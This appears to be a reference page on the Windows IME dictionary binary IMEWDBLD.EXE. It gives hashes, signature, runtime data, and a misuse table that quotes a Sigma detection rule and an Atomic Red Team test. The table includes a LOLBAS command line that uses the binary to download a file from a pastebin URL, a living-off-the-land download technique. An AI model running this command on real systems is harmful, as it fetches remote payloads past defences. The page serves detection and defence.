IMEWDBLD.EXE

  • File Path: C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 0984D217E10D11B2DBB8CCD47CDF36BD
SHA1 6BEBA2522259A3D06D21BA7B051C10F5BD42AD57
SHA256 C6CF94EE76F288CF59EDEBA4440CEDF08264EE1EA6F077DF654A0E9C5149F491
SHA384 B2BED978453E382510491B05274AD0759931273EB4151D6815BF3A413EF62872858882B2D710B985851CC6279165C9A8
SHA512 885060FBC753C4CE02BDF46671C70BDBA74E75584B14C5CC0826F3E184BA3ABB0FA279854121F9C5A7A6B75E64051DB57A38F88833B3A42530619A1FF11DA59A
SSDEEP 6144:sI9YzjicQ9utidKrVvI9p+hOHOty/sLRW3YolFqVQ7Gs/UEVTppNX+:rYzGcAGidKrVvI9p+MHOU/003FsQ7GsT
IMP 85CED23AC51CD18BBAAFE23E9D922D75
PESHA1 7BEEB221CD4C6AEB5536A18B258AF9D56693E715
PE256 06CAFF4A8699D8EBED8CF7A0653D452AE3FCC5232E968CB7BE55E6B3C70F2BD9

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_261b62a767ca4e6d File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1075 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1075
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/c6cf94ee76f288cf59edeba4440cedf08264ee1ea6f077df654a0e9c5149f491/detection/

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 36
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 36
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 40
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 38
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 41

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.